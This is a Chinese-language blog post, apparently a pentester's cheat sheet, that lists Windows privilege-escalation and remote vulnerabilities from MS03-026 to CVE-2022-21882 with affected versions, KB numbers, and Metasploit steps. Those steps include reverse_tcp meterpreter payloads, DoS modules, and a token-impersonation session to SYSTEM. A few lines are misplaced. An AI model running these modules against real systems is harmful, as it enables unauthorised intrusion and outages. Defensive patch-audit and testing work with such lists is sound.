windows提权总结

发布于 2022-04-14  290 次阅读

ms03-026  [KB823980]

影响版本

  • Microsoft Windows XP Professional SP1
  • Microsoft Windows XP Professional
  • Microsoft Windows XP Home SP1
  • Microsoft Windows XP Home
  • Microsoft Windows XP
  • Microsoft Windows NT 4.0SP6a
  • Microsoft Windows NT 4.0SP6
  • Microsoft Windows NT 4.0SP5
  • Microsoft Windows NT 4.0SP4
  • Microsoft Windows NT 4.0SP3
  • Microsoft Windows NT 4.0SP2
  • Microsoft Windows NT 4.0SP1
  • Microsoft Windows NT 4.0
  • Microsoft Windows 2003
  • Microsoft Windows 2000SP3
  • Microsoft Windows 2000SP2
  • Microsoft Windows 2000SP1
  • Microsoft Windows 2000

msf利用

msf > search ms03_026
msf > use exploit/windows/dcerpc/ms03_026_dcom
msf exploit(ms03_026_dcom) > set RHOST <target ip>
msf exploit(ms03_026_dcom) > set LHOST <local ip>

msf exploit(ms03_026_dcom) > exploit

MS05-039  [KB899588]

影响版本

  • Microsoft Windows 2000 Service Pack 4
  • Microsoft Windows XP Service Pack 1
  • Microsoft Windows XP Service Pack 2
  • Microsoft Windows XP Professional x64 Edition
  • Microsoft Windows Server 2003
  • Microsoft Windows Server 2003 Service Pack 1
  • Microsoft Windows Server 2003(用于基于 Itanium 的系统)Microsoft Windows Server 2003 Service Pack 1(用于基于 Itanium 的系统)
  • Microsoft Windows Server 2003 x64 Edition

msf利用

use exploit/windows/smb/ms05_039_pnp
set RHOST <target ip>
set LHOST <local ip>
exploit

MS06-040  [KB921883]

影响版本

  • Microsoft Windows 2000 Service Pack 4
  • Microsoft Windows XP Service Pack 1 和 Microsoft Windows XP Service Pack 2
  • Microsoft Windows XP Professional x64 Edition
  • Microsoft Windows Server 2003 和 Microsoft Windows Server 2003 Service Pack 1
  • Microsoft Windows Server 2003(用于基于 Itanium 的系统)和 Microsoft Windows Server 2003 SP1(用于基于 Itanium 的系统)
  • Microsoft Windows Server 2003 x64 Edition

msf利用

use exploit/windows/smb/ms06_040_netapi
set RHOST <target ip>
set LHOST <local ip>
exploit

MS08-025  [KB941693]

影响版本

  • Microsoft Windows 2000 Service Pack 4
  • Windows XP Service Pack 2
  • Windows 2003

MS08-066  [KB956803]

影响版本

  • windows xp
  • windows 2003

MS08-067  [KB958644]

影响版本

  • windows 2000
  • windows xp
  • windows 2003
  • windows 2008
  • windows7

msf

use exploit/windows/smb/ms08_067_netapi
set RHOST <target ip>
set LHOST <local ip>
exploit

MS08-068  [KB957097]

影响版本

  • Windows2000
  • windowsxp
  • windows2003
  • Windows Vista
  • windows 2008

msf

msf > use exploit/windows/smb/smb_relay
msf exploit(smb_relay) > show targets
    ...targets...
msf exploit(smb_relay) > set TARGET <target-id>
msf exploit(smb_relay) > show options
    ...show and set options...
msf exploit(smb_relay) > exploit

MS09-012 (巴西烤肉)(pr) [KB959454]

影响版本

  • win2000
  • winxp
  • win2003
  • winvista
  • win2008

MS09-020  [KB970483]

影响版本

  • win2000
  • winxp
  • Windows Server 2003 Service Pack 2
  • Windows Server 2003 x64 Edition Service Pack 2
  • Windows Server 2003 SP2(用于基于 Itanium 的系统)

MS09-050  [KB975517]

影响版本

  • win2008
  • win Vista

msf

msf > search MS09_050
msf > use exploit/windows/smb/ms09_050_smb2_negotiate_func_index 
msf exploit(ms09_050_smb2_negotiate_func_index) > options
msf exploit(ms09_050_smb2_negotiate_func_index) > set payload windows/meterpreter/reverse_tcp
msf exploit(ms09_050_smb2_negotiate_func_index) > set rhost <local ip>
msf exploit(ms09_050_smb2_negotiate_func_index) > run

MS10-012  [KB971468]

影响版本

  • win7
  • win2008
  • win vista

MS10-015  [KB977165]

影响版本

  • win2003
  • win2008
  • win7
  • winxp

msf

msf > use exploit/windows/local/ms10_015_kitrap0d
msf exploit(ms10_015_kitrap0d) > show targets
    ...targets...
msf exploit(ms10_015_kitrap0d) > set TARGET <target-id>
msf exploit(ms10_015_kitrap0d) > show options
    ...show and set options...
msf exploit(ms10_015_kitrap0d) > exploit

MS10-048  [KB2160329]

影响版本

  • winxp
  • win2003
  • win2008
  • win7
  • win2008

MS10-059  [KB982799]

影响版本

  • win2008
  • win7
  • win Vista

MS10-065  [KB2267960]

影响版本

  • IIS 5.1、6.0、7.0 和 7.5(fastcgi)

msf

msf > use auxiliary/dos/windows/http/ms10_065_ii6_asp_dos
msf auxiliary(ms10_065_ii6_asp_dos) > show actions
    ...actions...
msf auxiliary(ms10_065_ii6_asp_dos) > set ACTION <action-name>
msf auxiliary(ms10_065_ii6_asp_dos) > show options
    ...show and set options...
msf auxiliary(ms10_065_ii6_asp_dos) > run

MS10-092  [KB2305420]

影响版本

  • win2008
  • win7

msf

msf > use exploit/windows/local/ms10_092_schelevator
msf exploit(ms10_092_schelevator) > show targets
    ...targets...
msf exploit(ms10_092_schelevator) > set TARGET <target-id>
msf exploit(ms10_092_schelevator) > show options
    ...show and set options...
msf exploit(ms10_092_schelevator) > exploit

MS11-011  [KB2393802]

影响版本

  • win2003
  • win2008
  • win7
  • winxp
  • winvista

MS11-046  [KB2503665]

影响版本

  • win2003
  • win2008
  • win7
  • winxp

MS11-062  [KB2566454]

影响版本

  • win2003
  • winxp

MS11-080  [KB2592799]

影响版本

  • win2003
  • winxp

msf

msf > use exploit/windows/local/ms11_080_afdjoinleaf
msf exploit(ms11_080_afdjoinleaf) > show targets
    ...targets...
msf exploit(ms11_080_afdjoinleaf) > set TARGET <target-id>
msf exploit(ms11_080_afdjoinleaf) > show options
    ...show and set options...
msf exploit(ms11_080_afdjoinleaf) > exploit

MS12-020  [KB2671387]

影响版本

  • win2003
  • win2008
  • winxp
  • win7

msf

msf > search ms12_020
msf > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf auxiliary(ms12_020_maxchannelids) > set RHOST <ip>
msf auxiliary(ms12_020_maxchannelids) > run

MS12-042  [KB2972621]

影响版本

  • win2003
  • win7

MS13-005  [KB2778930]

影响版本

  • win2003
  • win2008
  • win2012
  • win7
  • win8

msf

msf > use exploit/windows/local/ms13_005_hwnd_broadcast
msf exploit(ms13_005_hwnd_broadcast) > show targets
    ...targets...
msf exploit(ms13_005_hwnd_broadcast) > set TARGET <target-id>
msf exploit(ms13_005_hwnd_broadcast) > show options
    ...show and set options...
msf exploit(ms13_005_hwnd_broadcast) > exploit

MS13-046  [KB2840221]

影响版本

  • winxp
  • win2003
  • Windows Vista
  • win2008
  • win2012
  • win7
  • win8

MS13-053  [KB2850851]

影响版本

  • Windows Vista
  • winxp
  • win2003
  • win2008
  • win2012
  • win7
  • win8

msf

msf > use exploit/windows/local/ms13_053_schlamperei
msf exploit(ms13_053_schlamperei) > show targets
    ...targets...
msf exploit(ms13_053_schlamperei) > set TARGET <target-id>
msf exploit(ms13_053_schlamperei) > show options
    ...show and set options...
msf exploit(ms13_053_schlamperei) > exploit

MS14-002  [KB2914368]

影响版本

  • winxp
  • win2003

msf

  msf > use exploit/windows/local/ms_ndproxy
  msf exploit(ms_ndproxy) > show targets
        ...targets...
  msf exploit(ms_ndproxy) > set TARGET <target-id>
  msf exploit(ms_ndproxy) > show options
        ...show and set options...
  msf exploit(ms_ndproxy) > exploit

MS14-040  [KB2975684]

影响版本

  • Windows Vista
  • win2003
  • win2008
  • win2012
  • win7
  • win8
  • win8.1

MS14-058  [KB3000061]

影响版本

  • win2003

msf

    msf > use exploit/windows/local/ms14_058_track_popup_menu
    msf exploit(ms14_058_track_popup_menu) > show targets
          ...targets...
    msf exploit(ms14_058_track_popup_menu) > set TARGET <target-id>
    msf exploit(ms14_058_track_popup_menu) > show options
          ...show and set options...
    msf exploit(ms14_058_track_popup_menu) > exploit

MS14-066  [KB2992611]

影响版本

  • Windows Vista
  • win2003
  • win2008
  • win2012
  • win7
  • win8
  • win8.1

MS14-068  [KB3011780]

影响版本

  • Windows Vista
  • win2003
  • win2008
  • win2012
  • win7
  • win8
  • win8.1

MS14-070  [KB2989935]

影响版本

  • win2003

MS15-001  [KB3023266]

影响版本

  • win7
  • win8
  • win8.1

MS15-010  [KB3036220]

影响版本

  • Windows Vista
  • win2003
  • win2008
  • win2012
  • win7
  • win8
  • win8.1

MS15-015  [KB3031432]

影响版本

  • win7
  • win8
  • win8.1

MS15-051  [KB3057191]

影响版本

  • win2003
  • win2008
  • win2012
  • win7
  • win8

msf

 msf > use exploit/windows/local/ms15_051_client_copy_image
      msf exploit(ms15_051_client_copy_image) > show targets
            ...targets...
      msf exploit(ms15_051_client_copy_image) > set TARGET <target-id>
      msf exploit(ms15_051_client_copy_image) > show options
            ...show and set options...
      msf exploit(ms15_051_client_copy_image) > exploit

MS15-061  [KB3057839]

影响版本

  • win2003
  • win2008
  • win2012
  • win7
  • win8

MS15-076  [KB3067505]

影响版本

  • win2003
  • win2008
  • win2012
  • win7
  • win8

MS15-077  [KB3077657]

影响版本

  • win2003
  • win2008
  • win2012
  • win7
  • win8

MS15-097  [KB3089656]

影响版本

  • Windows Vista
  • win2008
  • win2012
  • win7
  • win8
  • win8.1

MS16-014  [K3134228]

影响版本

  • Windows Vista Service Pack 2
  • Windows Server 2008
  • Windows 7
  • Windows Server 2008 R2(用于基于 x64 的系统
  • Windows Server 2008 R2(用于基于 Itanium 的系统)Service Pack 1

MS16-016  [KB3136041]

影响版本

  • win2008
  • win7
  • winvista

msf

msf > use exploit/windows/local/ms16_016_webdav

MS16-032  [KB3143141]

影响版本

  • win2008
  • win2012
  • win7
  • win8
  • win10

msf

 msf > use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
 msf exploit(ms16_032_secondary_logon_handle_privesc) > show targets
        ...targets...
 msf exploit(ms16_032_secondary_logon_handle_privesc) > set TARGET <target-id>
 msf exploit(ms16_032_secondary_logon_handle_privesc) > show options
        ...show and set options...
 msf exploit(ms16_032_secondary_logon_handle_privesc) > exploit

MS16-034  [KB3143145]

影响版本

  • win2008
  • win2012
  • win7
  • win8
  • win10

MS16-075 (烂土豆) [KB3164038]

影响版本

  • in2008
  • win2012
  • win7
  • win8
  • win10

msf

msf exploit(web_delivery) > set ExitOnsession false
msf exploit(web_delivery) > run
meterpreter > getuid
Server username: IIS APPPOOL\DefaultAppPool
meterpreter > getprivs
===========================================================
Enabled Process Privileges
===========================================================
 SeAssignPrimaryTokenPrivilege

meterpreter > upload  /root/potato.exe C:\Users\Public
meterpreter > cd C:\\Users\\Public
meterpreter > use incognito
meterpreter > list_tokens -u
NT AUTHORITY\IUSR

meterpreter > execute -cH -f ./potato.exe
meterpreter > list_tokens -u
NT AUTHORITY\IUSR
NT AUTHORITY\SYSTEM

meterpreter > impersonate_token "NT AUTHORITY\\SYSTEM"

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

MS16-098  [KB3178466]

影响版本

  • win8.1

MS16-111  [KB3186973]

影响版本

  • win10-1703以下
  • win8
  • win2003
  • win2008
  • win2012

MS16-135  [KB3199135]

影响版本

  • win7
  • win2008Service Pack 1
  • win8.1
  • win10-1607

MS17-010  [KB4013389]

影响版本

  • win7
  • win2008
  • winxp

ms17-017 [KB4013081]

影响版本

  • Microsoft Windows Vista
  • Microsoft Windows Server 2008
  • Microsoft Windows 7

CVE-2017-0213  

影响版本

  • Windows10,包括1511、1607、1703这三个版本
  • Windows 7 SP1
  • Windows 8.1、RT8.1
  • Windows Server 2008 SP2、2008R2 SP1
  • Windows Server 2012、2012R2
  • CVE-2018-8440
  • Windows Server 2016


CVE-2017-8464 [KB4024402][KB4022722]

影响版本

  • Windows 10
  • Windows 7
  • Windows 8.1
  • Windows RT 8.1
  • Windows Server 2008
  • Windows Server 2008 R2
  • Windows Server 2012
  • Windows Server 2012 R2
  • Windows Server 2016

msf

msf > use exploit/windows/fileformat/cve_2017_8464_lnk_rce
msf exploit(cve_2017_8464_lnk_rce) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf exploit(cve_2017_8464_lnk_rce) > set lhost <local-ip>
msf exploit(cve_2017_8464_lnk_rce) > set lport 8988
msf exploit(cve_2017_8464_lnk_rce) > run
msf exploit(ms10_092_schelevator) > exploit

msf exploit(cve_2017_8464_lnk_rce) > use exploit/multi/handler 
msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp
msf exploit(handler) > set lhost <local-ip>
msf exploit(handler) > set lport 8988
msf exploit(handler) > run

CVE-2018-8120

影响版本

  • Windows 7 for 32-bit Systems Service Pack 1
  • Windows 7 for x64-based Systems Service Pack 1
  • Windows Server 2008 for 32-bit Systems Service Pack 2
  • Windows Server 2008 for 32-bit Systems Service Pack 2
  • Windows Server 2008 for Itanium-Based Systems ServicePack 2
  • Windows Server 2008 for x64-based Systems Service Pack 2
  • Windows Server 2008 for x64-based Systems Service Pack 2
  • Windows Server 2008 R2 for Itanium-Based Systems ServicePack 1
  • Windows Server 2008 R2 for x64-based Systems ServicePack 1
  • Windows Server 2008 R2 for x64-based Systems ServicePack 1

msf

use exploit/windows/local/ms18_8120_win32k_privesc

CVE-2018-1038 [KB4088878][KB4074587][KB4056897]

影响版本

  • Windows 7 SP1
  • Windows Server 2008 R2 SP1

CVE-2018-8639 [KB4100480]

影响版本

  • Windows 7
  • Windows Server 2012 R2
  • Windows RT 8.1
  • Windows Server 2008
  • Windows Server 2019
  • Windows Server 2012
  • Windows 8.1
  • Windows Server 2016
  • Windows Server 2008 R2
  • Windows 10 1607、1703、1709、1803、1809

CVE-2019-0803 [kb44934**]

影响版本

  • Microsoft Windows Server 2019 0
  • Microsoft Windows Server 2016 0
  • Microsoft Windows Server 2012 R2 0
  • Microsoft Windows Server 2012 0
  • Microsoft Windows Server 2008 R2 for x64-based Systems SP1
  • Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1
  • Microsoft Windows Server 2008 for x64-based Systems SP2
  • Microsoft Windows Server 2008 for Itanium-based Systems SP2
  • Microsoft Windows Server 2008 for 32-bit Systems SP2
  • Microsoft Windows Server 1803 0
  • Microsoft Windows Server 1709 0
  • Microsoft Windows RT 8.1
  • Microsoft Windows 8.1 for x64-based Systems
  • Microsoft Windows 8.1 for 32-bit Systems 0
  • Microsoft Windows 7 for x64-based Systems S1
  • Microsoft Windows 7 for 32-bit Systems SP1
  • Microsoft Windows 10 Version 1809 for x64-based Systems 0
  • Microsoft Windows 10 Version 1809 for ARM64-based Systems 0
  • Microsoft Windows 10 Version 1809 for 32-bit Systems 0
  • Microsoft Windows 10 Version 1803 for x64-based Systems 0
  • Microsoft Windows 10 Version 1803 for ARM64-based Systems 0
  • Microsoft Windows 10 Version 1803 for 32-bit Systems 0
  • Microsoft Windows 10 version 1709 for x64-based Systems 0
  • Microsoft Windows 10 Version 1709 for ARM64-based Systems 0
  • Microsoft Windows 10 version 1709 for 32-bit Systems 0
  • Microsoft Windows 10 version 1703 for x64-based Systems 0
  • Microsoft Windows 10 version 1703 for 32-bit Systems 0
  • Microsoft Windows 10 Version 1607 for x64-based Systems 0
  • Microsoft Windows 10 Version 1607 for 32-bit Systems 0
  • Microsoft Windows 10 for x64-based Systems 0
  • Microsoft Windows 10 for 32-bit Systems

CVE-2019-1388[KB4525235][KB4525233]

影响版本

  • Microsoft Windows Server 2019
  • Microsoft Windows Server 2016
  • Microsoft Windows Server 2012
  • Microsoft Windows Server 2008 R2
  • Microsoft Windows Server 2008
  • Microsoft Windows RT 8.1
  • Microsoft Windows 8.1
  • Microsoft Windows 7


CVE-2019-1458

影响版本

  • Microsoft Windows 10 Version 1607 for 32-bit Systems
  • Microsoft Windows 10 Version 1607 for x64-based Systems
  • Microsoft Windows 10 for 32-bit Systems
  • Microsoft Windows 10 for x64-based Systems
  • Microsoft Windows 7 for 32-bit Systems SP1
  • Microsoft Windows 7 for x64-based Systems SP1
  • Microsoft Windows 8.1 for 32-bit Systems
  • Microsoft Windows 8.1 for x64-based Systems
  • Microsoft Windows RT 8.1
  • Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1
  • Microsoft Windows Server 2008 R2 for x64-based Systems SP1
  • Microsoft Windows Server 2008 for 32-bit Systems SP2
  • Microsoft Windows Server 2008 for Itanium-based Systems SP2
  • Microsoft Windows Server 2008 for x64-based Systems SP2
  • Microsoft Windows Server 2012
  • Microsoft Windows Server 2012 R2
  • Microsoft Windows Server 2016


CVE-2020-0796 [KB4551762]

影响版本

  • Windows 10 Version 1903 for 32-bit Systems
  • Windows 10 Version 1903 for x64-based Systems
  • Windows 10 Version 1903 for ARM64-based Systems
  • Windows Server, Version 1903 (Server Core installation)
  • Windows 10 Version 1909 for 32-bit Systems
  • Windows 10 Version 1909 for x64-based Systems
  • Windows 10 Version 1909 for ARM64-based Systems
  • Windows Server, Version 1909 (Server Core installation)


CVE-2021-1732 [4601345][4601349]

影响版本

  • Windows Server, version 20H2 (Server Core Installation)
  • Windows 10 Version 20H2 for ARM64­based Systems
  • Windows 10 Version 20H2 for 32­bit Systems
  • Windows 10 Version 20H2 for x64­based Systems
  • Windows Server, version 2004 (Server Core installation)
  • Windows 10 Version 2004 for x64­based Systems
  • Windows 10 Version 2004 for ARM64­based Systems
  • Windows 10 Version 2004 for 32­bit Systems
  • Windows Server, version 1909 (Server Core installation)
  • Windows 10 Version 1909 for ARM64­based Systems
  • Windows 10 Version 1909 for x64­based Systems
  • Windows 10 Version 1909 for 32­bit Systems
  • Windows Server 2019 (Server Core installation)
  • Windows Server 2019
  • Windows 10 Version 1809 for ARM64­based Systems
  • Windows 10 Version 1809 for x64­based Systems
  • Windows 10 Version 1809 for 32­bit Systems
  • Windows 10 Version 1803 for ARM64­based Systems
  • Windows 10 Version 1803 for x64­based Systems

CVE-2021-33739[5003637]

影响版本

  • Windows 10

CVE-2021-40449[,5006714,5006729,5006739,5006732,5006743,5006728,5006736,5006715,5006670,5006675,5006667,5006672]

影响版本

  •  windows 10

域提权,CVE-2021-42287[KB5008602]

  • Windows Server 2012 R2 (Server Core installation)
  • Windows Server 2012 R2
  • Windows Server 2012 (Server Core installation)
  • Windows Server 2012
  • Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
  • Windows Server 2008 R2 for x64-based Systems Service Pack 1
  • Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
  • Windows Server 2008 for x64-based Systems Service Pack 2
  • Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
  • Windows Server 2008 for 32-bit Systems Service Pack 2
  • Windows Server 2016 (Server Core installation)
  • Windows Server 2016
  • Windows Server, version 20H2 (Server Core Installation)
  • Windows Server, version 2004 (Server Core installation)
  • Windows Server 2022 (Server Core installation)
  • Windows Server 2022
  • Windows Server 2019 (Server Core installation)

域提权,CVE-2021-42278[KB5008380]

影响版本

  • Windows Server 2012 R2 (Server Core installation)
  • Windows Server 2012 R2
  • Windows Server 2012 (Server Core installation)
  • Windows Server 2012
  • Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
  • Windows Server 2008 R2 for x64-based Systems Service Pack 1
  • Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
  • Windows Server 2008 for x64-based Systems Service Pack 2
  • Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
  • Windows Server 2008 for 32-bit Systems Service Pack 2
  • Windows Server 2016 (Server Core installation)
  • Windows Server 2016
  • Windows Server, version 20H2 (Server Core Installation)
  • Windows Server, version 2004 (Server Core installation)
  • Windows Server 2022 (Server Core installation)
  • Windows Server 2022
  • Windows Server 2019 (Server Core

CVE-2022-21882[5009566,5009543,5009545]

影响版本

  • Windows 10 Version 1809/1909/2004/20H2/21H1/21H2 for 32/64-bit Systems
  • Windows Server, version 20H2 (Server Core Installation)
  • Windows 11 for ARM64/x64-based Systems
  • Windows Server 2019/2022